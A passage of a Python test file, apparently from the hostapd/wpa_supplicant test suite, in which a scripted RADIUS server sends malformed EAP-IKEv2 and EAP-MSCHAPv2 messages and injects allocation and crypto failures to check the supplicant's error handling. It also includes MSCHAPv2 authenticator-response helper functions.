            ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
                              0, 0, 8, 1, 1, 0, 1)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too small transform length in SAi1")
            ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
                              0, 0, 8 + 8, 1, 1, 0, 1,
                              0, 0, 7, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too large transform length in SAi1")
            ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
                              0, 0, 8 + 8, 1, 1, 0, 1,
                              0, 0, 9, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Transform type in SAi1")
            ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
                              0, 0, 8 + 8, 1, 1, 0, 1,
                              1, 0, 8, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No transform attributes in SAi1")
            ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
                              0, 0, 8 + 8, 1, 1, 0, 1,
                              0, 0, 8, 0, 0, 0)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No transform attr for AES and unexpected data after transforms in SAi1")
            tlen1 = 8 + 3
            tlen2 = 8 + 4
            tlen3 = 8 + 4
            tlen = tlen1 + tlen2 + tlen3
            ike = struct.pack(">BBHBBHBBBBBBHBBH3BBBHBBHHHBBHBBHHHB",
                              0, 0, 4 + 8 + tlen + 1,
                              0, 0, 8 + tlen + 1, 1, 1, 0, 3,
                              3, 0, tlen1, 1, 0, 12, 1, 2, 3,
                              3, 0, tlen2, 1, 0, 12, 0, 128,
                              0, 0, tlen3, 1, 0, 12, 0x8000 | 14, 127,
                              1)
            return build_ike(ctx['id'], next=33, ike=ike)
        # Helper: a valid SA payload with five transforms, used by the
        # remaining cases that need an acceptable proposal.
        def build_sa(next=0):
            tlen = 5 * 8
            return struct.pack(">BBHBBHBBBBBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
                               next, 0, 4 + 8 + tlen,
                               0, 0, 8 + tlen, 1, 1, 0, 5,
                               3, 0, 8, 1, 0, 3,
                               3, 0, 8, 2, 0, 1,
                               3, 0, 8, 3, 0, 1,
                               3, 0, 8, 4, 0, 5,
                               0, 0, 8, 241, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid proposal, but no KEi in SAi1")
            ike = build_sa()
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Empty KEi in SAi1")
            ike = build_sa(next=34) + struct.pack(">BBH", 0, 0, 4)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Mismatch in DH Group in SAi1")
            ike = build_sa(next=34)
            ike += struct.pack(">BBHHH", 0, 0, 4 + 4 + 96, 12345, 0)
            ike += 96*'\x00'
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid DH public value length in SAi1")
            ike = build_sa(next=34)
            ike += struct.pack(">BBHHH", 0, 0, 4 + 4 + 96, 5, 0)
            ike += 96*'\x00'
            return build_ike(ctx['id'], next=33, ike=ike)
        # Helper: a KEi payload with DH group 5 and a 192-octet public value
        def build_ke(next=0):
            ke = struct.pack(">BBHHH", next, 0, 4 + 4 + 192, 5, 0)
            ke += 192*'\x00'
            return ke
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid proposal and KEi, but no Ni in SAi1")
            ike = build_sa(next=34)
            ike += build_ke()
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short Ni in SAi1")
            ike = build_sa(next=34)
            ike += build_ke(next=40)
            ike += struct.pack(">BBH", 0, 0, 4)
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too long Ni in SAi1")
            ike = build_sa(next=34)
            ike += build_ke(next=40)
            ike += struct.pack(">BBH", 0, 0, 4 + 257) + 257*'\x00'
            return build_ike(ctx['id'], next=33, ike=ike)
        # Helper: a 256-octet Ni (nonce) payload
        def build_ni(next=0):
            return struct.pack(">BBH", next, 0, 4 + 256) + 256*'\x00'
        # Helper: a fully valid SAi1 (SA + KEi + Ni) message.
        # NOTE(review): the id parameter is unused; build_ike() is called
        # with ctx['id'] directly, which is also what all callers pass in.
        def build_sai1(id):
            ike = build_sa(next=34)
            ike += build_ke(next=40)
            ike += build_ni()
            return build_ike(ctx['id'], next=33, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
            return build_sai1(ctx['id'])
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
            return build_sai1(ctx['id'])
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No integrity checksum")
            ike = ''
            return build_ike(ctx['id'], next=37, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
            return build_sai1(ctx['id'])
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated integrity checksum")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_IKEV2, 0x20)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
            return build_sai1(ctx['id'])
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid integrity checksum")
            ike = ''
            return build_ike(ctx['id'], next=37, flags=0x20, ike=ike)
        idx += 1
        if ctx['num'] == idx:
            logger.info("No more test responses available - test case completed")
            # Signal the driver loop below to stop starting new attempts
            global eap_proto_ikev2_test_done
            eap_proto_ikev2_test_done = True
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_IKEV2)
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)

    srv = start_radius_server(ikev2_handler)

    try:
        hapd = start_ap(apdev[0]['ifname'])

        # Keep initiating connection attempts until the handler has served
        # every scripted response.
        i = 0
        while not eap_proto_ikev2_test_done:
            i += 1
            logger.info("Running connection iteration %d" % i)
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="IKEV2", identity="user",
                           password="password",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP method start")
            # Iterations 41 and 46 end in an explicit EAP-Failure from the
            # handler; for the rest, just give processing a moment.
            if i in [ 41, 46 ]:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            else:
                time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
            dev[0].dump_monitor()
            dev[1].dump_monitor()
            dev[2].dump_monitor()
    finally:
        stop_radius_server(srv)
def NtPasswordHash(password):
    """Return the 16-octet NT password hash: MD4 over the UTF-16LE password."""
    return hashlib.new('md4', password.encode('utf_16_le')).digest()
def HashNtPasswordHash(password_hash):
    """Return MD4 of an NT password hash (the "hash of the hash")."""
    md4 = hashlib.new('md4')
    md4.update(password_hash)
    return md4.digest()
def ChallengeHash(peer_challenge, auth_challenge, username):
    """Derive the 8-octet challenge as the first 8 bytes of
    SHA-1(PeerChallenge | AuthenticatorChallenge | UserName)."""
    digest = hashlib.sha1(peer_challenge + auth_challenge + username).digest()
    return digest[:8]
def GenerateAuthenticatorResponse(password, nt_response, peer_challenge,
                                  auth_challenge, username):
    """Compute the 20-octet MSCHAPv2 Authenticator Response.

    Combines the double NT password hash, the NT-Response, and the derived
    challenge with the two fixed "magic" constants through two SHA-1
    passes, using NtPasswordHash()/HashNtPasswordHash()/ChallengeHash().
    """
    magic1 = binascii.unhexlify("4D616769632073657276657220746F20636C69656E74207369676E696E6720636F6E7374616E74")
    magic2 = binascii.unhexlify("50616420746F206D616B6520697420646F206D6F7265207468616E206F6E6520697465726174696F6E")
    # First pass: SHA-1 over hash-of-password-hash | NT-Response | magic1
    pw_hash_hash = HashNtPasswordHash(NtPasswordHash(password))
    inner = hashlib.sha1(pw_hash_hash + nt_response + magic1).digest()
    # Second pass: mix in the 8-octet derived challenge and magic2
    challenge = ChallengeHash(peer_challenge, auth_challenge, username)
    return hashlib.sha1(inner + challenge + magic2).digest()
def test_eap_proto_ikev2_errors(dev, apdev):
    """EAP-IKEv2 local error cases

    Forces allocation failures (alloc_fail) and crypto/RNG failures
    (fail_test) at specific functions in the wpa_supplicant EAP-IKEv2
    peer implementation and verifies each local error path is triggered
    and handled cleanly.
    """
    check_eap_capa(dev[0], "IKEV2")
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)
    # Allocation failure at each of the first four allocations inside
    # eap_ikev2_init
    for i in range(1, 5):
        with alloc_fail(dev[0], i, "eap_ikev2_init"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="IKEV2", identity="ikev2 user",
                           password="ike password",
                           wait_connect=False)
            ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Allocation failures at (count, function) points during a normal
    # authentication attempt; the polling loop waits for the failure to
    # be consumed (GET_ALLOC_FAIL reporting a '0:' count).
    tests = [ (1, "ikev2_encr_encrypt"),
              (1, "ikev2_encr_decrypt"),
              (1, "ikev2_derive_auth_data"),
              (2, "ikev2_derive_auth_data"),
              (1, "=ikev2_decrypt_payload"),
              (1, "ikev2_encr_decrypt;ikev2_decrypt_payload"),
              (1, "ikev2_encr_encrypt;ikev2_build_encrypted"),
              (1, "ikev2_derive_sk_keys"),
              (2, "ikev2_derive_sk_keys"),
              (3, "ikev2_derive_sk_keys"),
              (4, "ikev2_derive_sk_keys"),
              (5, "ikev2_derive_sk_keys"),
              (6, "ikev2_derive_sk_keys"),
              (7, "ikev2_derive_sk_keys"),
              (8, "ikev2_derive_sk_keys"),
              (1, "eap_ikev2_derive_keymat;eap_ikev2_peer_keymat"),
              (1, "eap_msg_alloc;eap_ikev2_build_msg"),
              (1, "eap_ikev2_getKey"),
              (1, "eap_ikev2_get_emsk"),
              (1, "eap_ikev2_get_session_id"),
              (1, "=ikev2_derive_keys"),
              (2, "=ikev2_derive_keys"),
              (1, "wpabuf_alloc;ikev2_process_kei"),
              (1, "=ikev2_process_idi"),
              (1, "ikev2_derive_auth_data;ikev2_build_auth"),
              (1, "wpabuf_alloc;ikev2_build_sa_init"),
              (2, "wpabuf_alloc;ikev2_build_sa_init"),
              (3, "wpabuf_alloc;ikev2_build_sa_init"),
              (4, "wpabuf_alloc;ikev2_build_sa_init"),
              (5, "wpabuf_alloc;ikev2_build_sa_init"),
              (6, "wpabuf_alloc;ikev2_build_sa_init"),
              (1, "wpabuf_alloc;ikev2_build_sa_auth"),
              (2, "wpabuf_alloc;ikev2_build_sa_auth"),
              (1, "ikev2_build_auth;ikev2_build_sa_auth") ]
    for count, func in tests:
        with alloc_fail(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="IKEV2", identity="ikev2 user",
                           password="ike password", erp="1", wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            # Poll up to ~1 second for the injected failure to trigger
            ok = False
            for j in range(10):
                state = dev[0].request('GET_ALLOC_FAIL')
                if state.startswith('0:'):
                    ok = True
                    break
                time.sleep(0.1)
            if not ok:
                raise Exception("No allocation failure seen for %d:%s" % (count, func))
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Notification building paths, reached by using a wrong password
    tests = [ (1, "wpabuf_alloc;ikev2_build_notify"),
              (2, "wpabuf_alloc;ikev2_build_notify"),
              (1, "ikev2_build_encrypted;ikev2_build_notify") ]
    for count, func in tests:
        with alloc_fail(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="IKEV2", identity="ikev2 user",
                           password="wrong password", erp="1",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            ok = False
            for j in range(10):
                state = dev[0].request('GET_ALLOC_FAIL')
                if state.startswith('0:'):
                    ok = True
                    break
                time.sleep(0.1)
            if not ok:
                raise Exception("No allocation failure seen for %d:%s" % (count, func))
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Crypto/RNG operation failures (fail_test instrumentation)
    tests = [ (1, "ikev2_integ_hash"),
              (1, "ikev2_integ_hash;ikev2_decrypt_payload"),
              (1, "os_get_random;ikev2_build_encrypted"),
              (1, "ikev2_prf_plus;ikev2_derive_sk_keys"),
              (1, "eap_ikev2_derive_keymat;eap_ikev2_peer_keymat"),
              (1, "os_get_random;ikev2_build_sa_init"),
              (2, "os_get_random;ikev2_build_sa_init"),
              (1, "ikev2_integ_hash;eap_ikev2_validate_icv"),
              (1, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_keys"),
              (1, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_auth_data"),
              (2, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_auth_data"),
              (3, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_auth_data") ]
    for count, func in tests:
        with fail_test(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="IKEV2", identity="ikev2 user",
                           password="ike password", wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            ok = False
            for j in range(10):
                state = dev[0].request('GET_FAIL')
                if state.startswith('0:'):
                    ok = True
                    break
                time.sleep(0.1)
            if not ok:
                raise Exception("No failure seen for %d:%s" % (count, func))
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Second AP with a tiny EAP fragment_size to exercise the
    # fragmentation reassembly paths.
    params = { "ssid": "eap-test2", "wpa": "2", "wpa_key_mgmt": "WPA-EAP",
               "rsn_pairwise": "CCMP", "ieee8021x": "1",
               "eap_server": "1", "eap_user_file": "auth_serv/eap_user.conf",
               "fragment_size": "50" }
    hostapd.add_ap(apdev[1]['ifname'], params)
    tests = [ (1, "eap_ikev2_build_frag_ack"),
              (1, "wpabuf_alloc;eap_ikev2_process_fragment") ]
    for count, func in tests:
        with alloc_fail(dev[0], count, func):
            dev[0].connect("eap-test2", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="IKEV2", identity="ikev2 user",
                           password="ike password", erp="1", wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            ok = False
            for j in range(10):
                state = dev[0].request('GET_ALLOC_FAIL')
                if state.startswith('0:'):
                    ok = True
                    break
                time.sleep(0.1)
            if not ok:
                raise Exception("No allocation failure seen for %d:%s" % (count, func))
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
def test_eap_proto_mschapv2(dev, apdev):
    """EAP-MSCHAPv2 protocol tests

    A scripted RADIUS server responds to each received EAP message with the
    next canned EAP-MSCHAPv2 message in a fixed sequence (many of them
    intentionally malformed: missing payloads, unknown op_codes, invalid
    ms_len/challenge lengths, out-of-order Success/Failure). Sixteen
    connection attempts are then driven through that sequence to exercise
    the peer's parsing and error-handling paths, including the
    password-expired / Change-Password flow.
    """
    check_eap_capa(dev[0], "MSCHAPV2")

    def mschapv2_handler(ctx, req):
        # Scripted responder: ctx['num'] counts received EAP messages across
        # the whole test run and selects which canned reply (idx) to send;
        # ctx['id'] tracks the EAP identifier used in the replies.
        logger.info("mschapv2_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_MSCHAPV2)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown MSCHAPv2 op_code")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1,
                               EAP_TYPE_MSCHAPV2,
                               0, 0, 5, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid ms_len and unknown MSCHAPv2 op_code")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1,
                               EAP_TYPE_MSCHAPV2,
                               255, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Success before challenge")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1,
                               EAP_TYPE_MSCHAPV2,
                               3, 0, 5, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure before challenge - required challenge field not present")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1,
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 5, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure before challenge - invalid failure challenge len")
            payload = 'C=12'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure before challenge - invalid failure challenge len")
            payload = 'C=12 V=3'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure before challenge - invalid failure challenge")
            payload = 'C=00112233445566778899aabbccddeefQ '
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure before challenge - password expired")
            payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Success after password change")
            payload = "S=1122334455667788990011223344556677889900"
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               3, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid challenge length")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1,
                               EAP_TYPE_MSCHAPV2,
                               1, 0, 4 + 1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short challenge packet")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1,
                               EAP_TYPE_MSCHAPV2,
                               1, 0, 4 + 1, 16)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1 + 16 + 6,
                               EAP_TYPE_MSCHAPV2,
                               1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure - password expired")
            payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Success after password change")
            # A Change-Password packet in EAP framing is expected to be
            # 591 bytes here: 4 (EAP hdr) + 1 (type) + 4 (MSCHAPv2 hdr) +
            # 516 + 16 + 16 + 8 + 24 + 2 payload fields parsed below.
            if len(req) != 591:
                logger.info("Unexpected Change-Password packet length: %s" % len(req))
                return None
            data = req[9:]
            enc_pw = data[0:516]
            data = data[516:]
            enc_hash = data[0:16]
            data = data[16:]
            peer_challenge = data[0:16]
            data = data[16:]
            # Reserved
            data = data[8:]
            nt_response = data[0:24]
            data = data[24:]
            flags = data
            logger.info("enc_hash: " + enc_hash.encode("hex"))
            logger.info("peer_challenge: " + peer_challenge.encode("hex"))
            logger.info("nt_response: " + nt_response.encode("hex"))
            logger.info("flags: " + flags.encode("hex"))
            auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
            logger.info("auth_challenge: " + auth_challenge.encode("hex"))
            auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
                                                      peer_challenge,
                                                      auth_challenge, "user")
            payload = "S=" + auth_resp.encode('hex').upper()
            logger.info("Success message payload: " + payload)
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               3, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure - password expired")
            payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Success after password change")
            # Second password-change round; same 591-byte layout as above.
            if len(req) != 591:
                logger.info("Unexpected Change-Password packet length: %s" % len(req))
                return None
            data = req[9:]
            enc_pw = data[0:516]
            data = data[516:]
            enc_hash = data[0:16]
            data = data[16:]
            peer_challenge = data[0:16]
            data = data[16:]
            # Reserved
            data = data[8:]
            nt_response = data[0:24]
            data = data[24:]
            flags = data
            logger.info("enc_hash: " + enc_hash.encode("hex"))
            logger.info("peer_challenge: " + peer_challenge.encode("hex"))
            logger.info("nt_response: " + nt_response.encode("hex"))
            logger.info("flags: " + flags.encode("hex"))
            auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
            logger.info("auth_challenge: " + auth_challenge.encode("hex"))
            auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
                                                      peer_challenge,
                                                      auth_challenge, "user")
            payload = "S=" + auth_resp.encode('hex').upper()
            logger.info("Success message payload: " + payload)
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               3, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1 + 16 + 6,
                               EAP_TYPE_MSCHAPV2,
                               1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure - authentication failure")
            payload = 'E=691 R=1 C=00112233445566778899aabbccddeeff V=3 M=Authentication failed'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1 + 16 + 6,
                               EAP_TYPE_MSCHAPV2,
                               1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure - authentication failure")
            payload = 'E=691 R=1 C=00112233445566778899aabbccddeeff V=3 M=Authentication failed (2)'
            return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + len(payload),
                               EAP_TYPE_MSCHAPV2,
                               4, 0, 4 + len(payload)) + payload
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge - invalid ms_len and workaround disabled")
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1 + 16 + 6,
                               EAP_TYPE_MSCHAPV2,
                               1, 0, 4 + 1 + 16 + 6 + 1, 16) + 16*'A' + 'foobar'
        # End of scripted sequence.
        return None
    srv = start_radius_server(mschapv2_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        # Each iteration i consumes the next part of the handler's scripted
        # message sequence; a few iterations use special credentials:
        #   i == 12: password given as an NT hash
        #   i == 14: MSCHAPv2 retry disabled (phase2 mschapv2_retry=0)
        #   i == 15: EAP workarounds disabled
        for i in range(0, 16):
            logger.info("RUN: %d" % i)
            if i == 12:
                dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                               eap="MSCHAPV2", identity="user",
                               password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
                               wait_connect=False)
            elif i == 14:
                dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                               eap="MSCHAPV2", identity="user",
                               phase2="mschapv2_retry=0",
                               password="password", wait_connect=False)
            elif i == 15:
                dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                               eap="MSCHAPV2", identity="user",
                               eap_workaround="0",
                               password="password", wait_connect=False)
            else:
                dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                               eap="MSCHAPV2", identity="user",
                               password="password", wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            # Iterations that hit the password-expired responses have to
            # feed in the new password via the control interface.
            if i in [ 8, 11, 12 ]:
                ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on new password request")
                id = ev.split(':')[0].split('-')[-1]
                dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
                if i in [ 11, 12 ]:
                    ev = dev[0].wait_event(["CTRL-EVENT-PASSWORD-CHANGED"],
                                           timeout=10)
                    if ev is None:
                        raise Exception("Timeout on password change")
                    ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"],
                                           timeout=10)
                    if ev is None:
                        raise Exception("Timeout on EAP success")
                else:
                    ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
                                           timeout=10)
                    if ev is None:
                        raise Exception("Timeout on EAP failure")
            # Authentication-failure retry: supply identity and password
            # again when requested.
            if i in [ 13 ]:
                ev = dev[0].wait_event(["CTRL-REQ-IDENTITY"],
                                       timeout=10)
                if ev is None:
                    raise Exception("Timeout on identity request")
                id = ev.split(':')[0].split('-')[-1]
                dev[0].request("CTRL-RSP-IDENTITY-" + id + ":user")
